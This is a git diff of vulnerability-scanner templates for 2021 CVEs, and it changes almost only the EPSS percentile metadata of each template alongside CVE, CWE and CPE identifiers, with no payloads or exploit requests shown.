b/http/cves/2021/CVE-2021-25120.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-25120 cwe-id: CWE-79 epss-score: 0.00122 - epss-percentile: 0.46224 + epss-percentile: 0.46238 cpe: cpe:2.3:a:easysocialfeed:easy_social_feed:*:*:*:*:pro:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25281.yaml b/http/cves/2021/CVE-2021-25281.yaml index ccad504a62..a1d0923e2b 100644 --- a/http/cves/2021/CVE-2021-25281.yaml +++ b/http/cves/2021/CVE-2021-25281.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-25281 cwe-id: CWE-287 epss-score: 0.84203 - epss-percentile: 0.98127 + epss-percentile: 0.98129 cpe: cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25296.yaml b/http/cves/2021/CVE-2021-25296.yaml index 15d9536602..23fb7f1947 100644 --- a/http/cves/2021/CVE-2021-25296.yaml +++ b/http/cves/2021/CVE-2021-25296.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25296 cwe-id: CWE-78 epss-score: 0.89404 - epss-percentile: 0.98411 + epss-percentile: 0.98412 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25297.yaml b/http/cves/2021/CVE-2021-25297.yaml index 246a167b50..a1e8730352 100644 --- a/http/cves/2021/CVE-2021-25297.yaml +++ b/http/cves/2021/CVE-2021-25297.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25297 cwe-id: CWE-78 epss-score: 0.89404 - epss-percentile: 0.98411 + epss-percentile: 0.98412 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25298.yaml b/http/cves/2021/CVE-2021-25298.yaml index 7ea3d76a4d..fd4935890c 100644 --- a/http/cves/2021/CVE-2021-25298.yaml +++ b/http/cves/2021/CVE-2021-25298.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25298 cwe-id: CWE-78 epss-score: 0.97378 - epss-percentile: 0.9988 + epss-percentile: 0.99881 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25299.yaml b/http/cves/2021/CVE-2021-25299.yaml index d29314bae6..26bff62652 100644 --- a/http/cves/2021/CVE-2021-25299.yaml +++ b/http/cves/2021/CVE-2021-25299.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25299 cwe-id: CWE-79 epss-score: 0.96845 - epss-percentile: 0.99584 + epss-percentile: 0.99585 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25646.yaml b/http/cves/2021/CVE-2021-25646.yaml index 29a796f1a8..77f9481e97 100644 --- a/http/cves/2021/CVE-2021-25646.yaml +++ b/http/cves/2021/CVE-2021-25646.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25646 cwe-id: CWE-732 epss-score: 0.97403 - epss-percentile: 0.99899 + epss-percentile: 0.999 cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25899.yaml b/http/cves/2021/CVE-2021-25899.yaml index 9d6ff4407c..54c4d83873 100644 --- a/http/cves/2021/CVE-2021-25899.yaml +++ b/http/cves/2021/CVE-2021-25899.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-25899 cwe-id: CWE-89 epss-score: 0.53694 - epss-percentile: 0.97236 + epss-percentile: 0.97238 cpe: cpe:2.3:a:void:aurall_rec_monitor:9.0.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26086.yaml b/http/cves/2021/CVE-2021-26086.yaml index 172b716c95..6bcf994285 100644 --- a/http/cves/2021/CVE-2021-26086.yaml +++ b/http/cves/2021/CVE-2021-26086.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-26086 cwe-id: CWE-22 epss-score: 0.54993 - epss-percentile: 0.97265 + epss-percentile: 0.97266 cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26247.yaml b/http/cves/2021/CVE-2021-26247.yaml index 33fb7b54a7..b600b94ab2 100644 --- a/http/cves/2021/CVE-2021-26247.yaml +++ b/http/cves/2021/CVE-2021-26247.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-26247 cwe-id: CWE-79 epss-score: 0.00255 - epss-percentile: 0.63155 + epss-percentile: 0.63184 cpe: cpe:2.3:a:cacti:cacti:0.8.7g:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26295.yaml b/http/cves/2021/CVE-2021-26295.yaml index 3f3c12dfad..ff6a972dbd 100644 --- a/http/cves/2021/CVE-2021-26295.yaml +++ b/http/cves/2021/CVE-2021-26295.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-26295 cwe-id: CWE-502 epss-score: 0.97463 - epss-percentile: 0.99951 + epss-percentile: 0.9995 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-26475.yaml b/http/cves/2021/CVE-2021-26475.yaml index 5687289262..f9761e9c73 100644 --- a/http/cves/2021/CVE-2021-26475.yaml +++ b/http/cves/2021/CVE-2021-26475.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-26475 cwe-id: CWE-79 epss-score: 0.00175 - epss-percentile: 0.54559 + epss-percentile: 0.54584 cpe: cpe:2.3:a:eprints:eprints:3.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26598.yaml b/http/cves/2021/CVE-2021-26598.yaml index 5614f86f51..a45bcbfa2d 100644 --- a/http/cves/2021/CVE-2021-26598.yaml +++ b/http/cves/2021/CVE-2021-26598.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-26598 cwe-id: CWE-287 epss-score: 0.00506 - epss-percentile: 0.73842 + epss-percentile: 0.73868 cpe: cpe:2.3:a:impresscms:impresscms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-26702.yaml b/http/cves/2021/CVE-2021-26702.yaml index e92524c3a0..ac924383a7 100644 --- a/http/cves/2021/CVE-2021-26702.yaml +++ b/http/cves/2021/CVE-2021-26702.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-26702 cwe-id: CWE-79 epss-score: 0.00175 - epss-percentile: 0.54559 + epss-percentile: 0.54584 cpe: cpe:2.3:a:eprints:eprints:3.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26710.yaml b/http/cves/2021/CVE-2021-26710.yaml index bb7a3299aa..c21ced4391 100644 --- a/http/cves/2021/CVE-2021-26710.yaml +++ b/http/cves/2021/CVE-2021-26710.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-26710 cwe-id: CWE-79 epss-score: 0.00114 - epss-percentile: 0.44653 + epss-percentile: 0.44676 cpe: cpe:2.3:a:redwood:report2web:4.3.4.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26723.yaml b/http/cves/2021/CVE-2021-26723.yaml index 5ea87ca886..29fcbe6115 100644 --- a/http/cves/2021/CVE-2021-26723.yaml +++ b/http/cves/2021/CVE-2021-26723.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-26723 cwe-id: CWE-79 epss-score: 0.07461 - epss-percentile: 0.93374 + epss-percentile: 0.93379 cpe: cpe:2.3:a:jenzabar:jenzabar:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26812.yaml b/http/cves/2021/CVE-2021-26812.yaml index 1d4faca7a6..ab3ba02b65 100644 --- a/http/cves/2021/CVE-2021-26812.yaml +++ b/http/cves/2021/CVE-2021-26812.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-26812 cwe-id: CWE-79 epss-score: 0.00633 - epss-percentile: 0.76768 + epss-percentile: 0.76789 cpe: cpe:2.3:a:jitsi:meet:*:*:*:*:*:moodle:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26855.yaml b/http/cves/2021/CVE-2021-26855.yaml index 3a3ce8e1d0..f8d0d8c273 100644 --- a/http/cves/2021/CVE-2021-26855.yaml +++ b/http/cves/2021/CVE-2021-26855.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-26855 cwe-id: CWE-918 epss-score: 0.97494 - epss-percentile: 0.99971 + epss-percentile: 0.9997 cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_21:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-27124.yaml b/http/cves/2021/CVE-2021-27124.yaml index dd4151cae0..87d6af1655 100644 --- a/http/cves/2021/CVE-2021-27124.yaml +++ b/http/cves/2021/CVE-2021-27124.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-27124 cwe-id: CWE-89 epss-score: 0.02376 - epss-percentile: 0.88662 + epss-percentile: 0.88667 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-27132.yaml b/http/cves/2021/CVE-2021-27132.yaml index 2bcd254ee0..5ef305c439 100644 --- a/http/cves/2021/CVE-2021-27132.yaml +++ b/http/cves/2021/CVE-2021-27132.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-27132 cwe-id: CWE-74 epss-score: 0.03821 - epss-percentile: 0.90861 + epss-percentile: 0.90866 cpe: cpe:2.3:o:sercomm:agcombo_vd625_firmware:agsot_2.1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-27309.yaml b/http/cves/2021/CVE-2021-27309.yaml index 1d3836832a..ff089b38f1 100644 --- a/http/cves/2021/CVE-2021-27309.yaml +++ b/http/cves/2021/CVE-2021-27309.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-27309 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40941 + epss-percentile: 0.40964 cpe: cpe:2.3:a:csphere:clansphere:2011.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27310.yaml b/http/cves/2021/CVE-2021-27310.yaml index fd8220e454..276b3aa8e9 100644 --- a/http/cves/2021/CVE-2021-27310.yaml +++ b/http/cves/2021/CVE-2021-27310.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-27310 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40941 + epss-percentile: 0.40964 cpe: cpe:2.3:a:csphere:clansphere:2011.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-27314.yaml b/http/cves/2021/CVE-2021-27314.yaml index 858c343d7f..2f4f7ec49d 100644 --- a/http/cves/2021/CVE-2021-27314.yaml +++ b/http/cves/2021/CVE-2021-27314.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-27314 cwe-id: CWE-89 epss-score: 0.37027 - epss-percentile: 0.96742 + epss-percentile: 0.96743 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27315.yaml b/http/cves/2021/CVE-2021-27315.yaml index c950b1358f..e1b9b67718 100644 --- a/http/cves/2021/CVE-2021-27315.yaml +++ b/http/cves/2021/CVE-2021-27315.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-27315 cwe-id: CWE-89 epss-score: 0.10777 - epss-percentile: 0.94461 + epss-percentile: 0.94464 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27316.yaml b/http/cves/2021/CVE-2021-27316.yaml index b61546e074..9b578586d2 100644 --- a/http/cves/2021/CVE-2021-27316.yaml +++ b/http/cves/2021/CVE-2021-27316.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-27316 cwe-id: CWE-89 epss-score: 0.10777 - epss-percentile: 0.94461 + epss-percentile: 0.94464 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27319.yaml b/http/cves/2021/CVE-2021-27319.yaml index 9f9bf45cd5..424ba072f7 100644 --- a/http/cves/2021/CVE-2021-27319.yaml +++ b/http/cves/2021/CVE-2021-27319.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-27319 cwe-id: CWE-89 epss-score: 0.10777 - epss-percentile: 0.94461 + epss-percentile: 0.94464 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27320.yaml b/http/cves/2021/CVE-2021-27320.yaml index 5e278ee8bb..2b1aad74a2 100644 --- a/http/cves/2021/CVE-2021-27320.yaml +++ b/http/cves/2021/CVE-2021-27320.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-27320 cwe-id: CWE-89 epss-score: 0.12216 - epss-percentile: 0.9478 + epss-percentile: 0.94782 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27330.yaml b/http/cves/2021/CVE-2021-27330.yaml index 5e9e3aca9c..6a5e5d9085 100644 --- a/http/cves/2021/CVE-2021-27330.yaml +++ b/http/cves/2021/CVE-2021-27330.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-27330 cwe-id: CWE-79 epss-score: 0.00381 - epss-percentile: 0.69992 + epss-percentile: 0.7002 cpe: cpe:2.3:a:triconsole:datepicker_calendar:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27519.yaml b/http/cves/2021/CVE-2021-27519.yaml index bc9349e980..04eba94cc2 100644 --- a/http/cves/2021/CVE-2021-27519.yaml +++ b/http/cves/2021/CVE-2021-27519.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-27519 cwe-id: CWE-79 epss-score: 0.00189 - epss-percentile: 0.56251 + epss-percentile: 0.56275 cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27520.yaml b/http/cves/2021/CVE-2021-27520.yaml index 657e380d2a..b4c336a8a0 100644 --- a/http/cves/2021/CVE-2021-27520.yaml +++ b/http/cves/2021/CVE-2021-27520.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-27520 cwe-id: CWE-79 epss-score: 0.00189 - epss-percentile: 0.56251 + epss-percentile: 0.56275 cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27651.yaml b/http/cves/2021/CVE-2021-27651.yaml index bfe032dcec..6d395689be 100644 --- a/http/cves/2021/CVE-2021-27651.yaml +++ b/http/cves/2021/CVE-2021-27651.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-27651 cwe-id: CWE-287 epss-score: 0.04445 - epss-percentile: 0.91452 + epss-percentile: 0.91462 cpe: cpe:2.3:a:pega:infinity:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-27670.yaml b/http/cves/2021/CVE-2021-27670.yaml index 927671ac91..78fa160adf 100644 --- a/http/cves/2021/CVE-2021-27670.yaml +++ b/http/cves/2021/CVE-2021-27670.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-27670 cwe-id: CWE-918 epss-score: 0.35076 - epss-percentile: 0.96645 + epss-percentile: 0.96646 cpe: cpe:2.3:a:appspace:appspace:6.2.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27850.yaml b/http/cves/2021/CVE-2021-27850.yaml index 7df599830e..68c82eaf3e 100644 --- a/http/cves/2021/CVE-2021-27850.yaml +++ b/http/cves/2021/CVE-2021-27850.yaml @@ -17,7 +17,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-27850 - cwe-id: CWE-200,CWE-502 + cwe-id: CWE-502,CWE-200 epss-score: 0.97414 epss-percentile: 0.99906 cpe: cpe:2.3:a:apache:tapestry:*:*:*:*:*:*:*:* @@ -64,4 +64,5 @@ http: - '\/assets\/app\/([a-z0-9]+)\/services\/AppMod' internal: true part: header -# digest: 4a0a00473045022100ae5e72d0c7c9a8ee38995dd5706041a751b56d8fcb768981454b5b033b39a0a00220375d95d0155ea064261a32dbfb8bf9b9eb2a92f6957b00aa1e881cd4b1634d7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ae5e72d0c7c9a8ee38995dd5706041a751b56d8fcb768981454b5b033b39a0a00220375d95d0155ea064261a32dbfb8bf9b9eb2a92f6957b00aa1e881cd4b1634d7a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2021/CVE-2021-27909.yaml b/http/cves/2021/CVE-2021-27909.yaml index 34f5940906..c8fbdd7ffd 100644 --- a/http/cves/2021/CVE-2021-27909.yaml +++ b/http/cves/2021/CVE-2021-27909.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-27909 cwe-id: CWE-79 epss-score: 0.00094 - epss-percentile: 0.39448 + epss-percentile: 0.39463 cpe: cpe:2.3:a:acquia:mautic:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27931.yaml b/http/cves/2021/CVE-2021-27931.yaml index ea7a26d41f..bbb5c048f2 100644 --- a/http/cves/2021/CVE-2021-27931.yaml +++ b/http/cves/2021/CVE-2021-27931.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-27931 cwe-id: CWE-611 epss-score: 0.55442 - epss-percentile: 0.97277 + epss-percentile: 0.97278 cpe: cpe:2.3:a:lumis:lumis_experience_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-28149.yaml b/http/cves/2021/CVE-2021-28149.yaml index 2678e982f5..f3d8f1b837 100644 --- a/http/cves/2021/CVE-2021-28149.yaml +++ b/http/cves/2021/CVE-2021-28149.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-28149 cwe-id: CWE-22 epss-score: 0.06892 - epss-percentile: 0.93165 + epss-percentile: 0.93169 cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-28150.yaml b/http/cves/2021/CVE-2021-28150.yaml index 2ba070fdf3..b98cdc5969 100644 --- a/http/cves/2021/CVE-2021-28150.yaml +++ b/http/cves/2021/CVE-2021-28150.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-28150 cwe-id: CWE-425 epss-score: 0.00339 - epss-percentile: 0.68222 + epss-percentile: 0.68248 cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-28151.yaml b/http/cves/2021/CVE-2021-28151.yaml index 21fc65ebac..c0ed3e641c 100644 --- a/http/cves/2021/CVE-2021-28151.yaml +++ b/http/cves/2021/CVE-2021-28151.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-28151 cwe-id: CWE-78 epss-score: 0.97051 - epss-percentile: 0.99673 + epss-percentile: 0.99674 cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-28164.yaml b/http/cves/2021/CVE-2021-28164.yaml index 2c1514362b..db0a9161a2 100644 --- a/http/cves/2021/CVE-2021-28164.yaml +++ b/http/cves/2021/CVE-2021-28164.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-28164 cwe-id: CWE-200,NVD-CWE-Other epss-score: 0.02064 - epss-percentile: 0.87809 + epss-percentile: 0.87815 cpe: cpe:2.3:a:eclipse:jetty:9.4.37:20210219:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-28169.yaml b/http/cves/2021/CVE-2021-28169.yaml index fb2dd99c6e..322bb2d20b 100644 --- a/http/cves/2021/CVE-2021-28169.yaml +++ b/http/cves/2021/CVE-2021-28169.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-28169 cwe-id: CWE-200,NVD-CWE-Other epss-score: 0.00116 - epss-percentile: 0.45157 + epss-percentile: 0.45172 cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-28377.yaml b/http/cves/2021/CVE-2021-28377.yaml index 2d86a771de..ab599d35ec 100644 --- a/http/cves/2021/CVE-2021-28377.yaml +++ b/http/cves/2021/CVE-2021-28377.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-28377 cwe-id: CWE-22 epss-score: 0.00158 - epss-percentile: 0.52156 + epss-percentile: 0.5218 cpe: cpe:2.3:a:chronoengine:chronoforums:2.0.11:*:*:*:*:joomla:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-28419.yaml b/http/cves/2021/CVE-2021-28419.yaml index 6064ff1b3a..64b896ad40 100644 --- a/http/cves/2021/CVE-2021-28419.yaml +++ b/http/cves/2021/CVE-2021-28419.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-28419 cwe-id: CWE-89 epss-score: 0.17236 - epss-percentile: 0.95512 + epss-percentile: 0.95514 cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-28918.yaml b/http/cves/2021/CVE-2021-28918.yaml index 88a643754a..888dd7c9f9 100644 --- a/http/cves/2021/CVE-2021-28918.yaml +++ b/http/cves/2021/CVE-2021-28918.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-28918 cwe-id: CWE-704 epss-score: 0.02788 - epss-percentile: 0.89491 + epss-percentile: 0.89498 cpe: cpe:2.3:a:netmask_project:netmask:*:*:*:*:*:node.js:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-28937.yaml b/http/cves/2021/CVE-2021-28937.yaml index ba812dc8be..e5ae0ad97d 100644 --- a/http/cves/2021/CVE-2021-28937.yaml +++ b/http/cves/2021/CVE-2021-28937.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-28937 cwe-id: CWE-312 epss-score: 0.03352 - epss-percentile: 0.90305 + epss-percentile: 0.90311 cpe: cpe:2.3:o:acexy:wireless-n_wifi_repeater_firmware:28.08.06.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-29006.yaml b/http/cves/2021/CVE-2021-29006.yaml index 23648a720c..d0877f600f 100644 --- a/http/cves/2021/CVE-2021-29006.yaml +++ b/http/cves/2021/CVE-2021-29006.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-29006 cwe-id: CWE-22 epss-score: 0.10203 - epss-percentile: 0.94311 + epss-percentile: 0.94315 cpe: cpe:2.3:a:rconfig:rconfig:3.9.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-29156.yaml b/http/cves/2021/CVE-2021-29156.yaml index 341cb5f3bc..d234c21cca 100644 --- a/http/cves/2021/CVE-2021-29156.yaml +++ b/http/cves/2021/CVE-2021-29156.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-29156 cwe-id: CWE-74 epss-score: 0.36709 - epss-percentile: 0.96724 + epss-percentile: 0.96725 cpe: cpe:2.3:a:forgerock:openam:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-29203.yaml b/http/cves/2021/CVE-2021-29203.yaml index 2289937386..4d8f9c6ded 100644 --- a/http/cves/2021/CVE-2021-29203.yaml +++ b/http/cves/2021/CVE-2021-29203.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-29203 cwe-id: CWE-306 epss-score: 0.95745 - epss-percentile: 0.99232 + epss-percentile: 0.99233 cpe: cpe:2.3:a:hp:edgeline_infrastructure_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-29441.yaml b/http/cves/2021/CVE-2021-29441.yaml index 23d1d9d03e..fad09590e3 100644 --- a/http/cves/2021/CVE-2021-29441.yaml +++ b/http/cves/2021/CVE-2021-29441.yaml @@ -25,7 +25,7 @@ info: cve-id: CVE-2021-29441 cwe-id: CWE-290 epss-score: 0.96644 - epss-percentile: 0.99505 + epss-percentile: 0.99506 cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-29484.yaml b/http/cves/2021/CVE-2021-29484.yaml index 759d08f173..e3c684d688 100644 --- a/http/cves/2021/CVE-2021-29484.yaml +++ b/http/cves/2021/CVE-2021-29484.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-29484 cwe-id: CWE-79 epss-score: 0.01083 - epss-percentile: 0.82717 + epss-percentile: 0.82729 cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-29490.yaml b/http/cves/2021/CVE-2021-29490.yaml index 676ba42d7a..f9d4ed8385 100644 --- a/http/cves/2021/CVE-2021-29490.yaml +++ b/http/cves/2021/CVE-2021-29490.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-29490 cwe-id: CWE-918 epss-score: 0.00137 - epss-percentile: 0.48881 + epss-percentile: 0.48898 cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-29505.yaml b/http/cves/2021/CVE-2021-29505.yaml index 47eae89a70..f064919384 100644 --- a/http/cves/2021/CVE-2021-29505.yaml +++ b/http/cves/2021/CVE-2021-29505.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-29505 cwe-id: CWE-502 epss-score: 0.02373 - epss-percentile: 0.88654 + epss-percentile: 0.88659 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-29622.yaml b/http/cves/2021/CVE-2021-29622.yaml index 8f9c2aea76..9e87a41a9e 100644 --- a/http/cves/2021/CVE-2021-29622.yaml +++ b/http/cves/2021/CVE-2021-29622.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-29622 cwe-id: CWE-601 epss-score: 0.00225 - epss-percentile: 0.60649 + epss-percentile: 0.6068 cpe: cpe:2.3:a:prometheus:prometheus:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-29625.yaml b/http/cves/2021/CVE-2021-29625.yaml index f0ed7501d4..aefcb460f9 100644 --- a/http/cves/2021/CVE-2021-29625.yaml +++ b/http/cves/2021/CVE-2021-29625.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-29625 cwe-id: CWE-79 epss-score: 0.00212 - epss-percentile: 0.59014 + epss-percentile: 0.59045 cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3002.yaml b/http/cves/2021/CVE-2021-3002.yaml index 1b13dbb978..df1d8b2949 100644 --- a/http/cves/2021/CVE-2021-3002.yaml +++ b/http/cves/2021/CVE-2021-3002.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-3002 cwe-id: CWE-79 epss-score: 0.00143 - epss-percentile: 0.49992 + epss-percentile: 0.50011 cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-30049.yaml b/http/cves/2021/CVE-2021-30049.yaml index 31d97c789b..946f0b24ce 100644 --- a/http/cves/2021/CVE-2021-30049.yaml +++ b/http/cves/2021/CVE-2021-30049.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-30049 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41323 + epss-percentile: 0.41347 cpe: cpe:2.3:a:sysaid:sysaid:20.3.64:b14:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-30128.yaml b/http/cves/2021/CVE-2021-30128.yaml index d1f837bb03..c873a4d013 100644 --- a/http/cves/2021/CVE-2021-30128.yaml +++ b/http/cves/2021/CVE-2021-30128.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-30128 cwe-id: CWE-502 epss-score: 0.19253 - epss-percentile: 0.95699 + epss-percentile: 0.95702 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-30134.yaml b/http/cves/2021/CVE-2021-30134.yaml index eb6f8366c5..896b37f619 100644 --- a/http/cves/2021/CVE-2021-30134.yaml +++ b/http/cves/2021/CVE-2021-30134.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-30134 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29488 + epss-percentile: 0.29485 cpe: 